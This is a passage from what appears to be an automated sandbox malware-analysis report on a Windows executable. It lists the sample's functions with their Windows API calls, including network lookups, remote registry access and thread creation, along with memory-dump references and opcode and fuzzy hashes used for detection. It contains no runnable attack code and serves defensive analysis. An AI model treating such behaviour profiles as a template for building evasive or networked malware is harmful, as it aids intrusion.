                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 077a930adce2e2e575ae573d9966b00f654a320f8e1671167757538259768175
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00440F0A Relevance: 12.1, APIs: 8, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00440F24
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00440F2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00440F46
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434FD0 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00434FF2
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435017
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435043
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0043504A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00435072
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0043507B
                                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0043509B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004350A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ee35db800600f3cc28c1728c86170bfab7cf2c43a8d594881b808c5ba37eb322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f42878b2159185360852a952fd690a32193869b943547c3e204aa20c586f66a1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee35db800600f3cc28c1728c86170bfab7cf2c43a8d594881b808c5ba37eb322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD21B4327001146BD710ABA9EC49FAF73A8EB9D731F04427BFA05DB390DAA5984487F5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B555
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B578
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2737351978-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00415253
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                                                                                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0041529E
                                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3638380555-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3207048006-625585964
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 004656CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2945290962-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1457242333-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
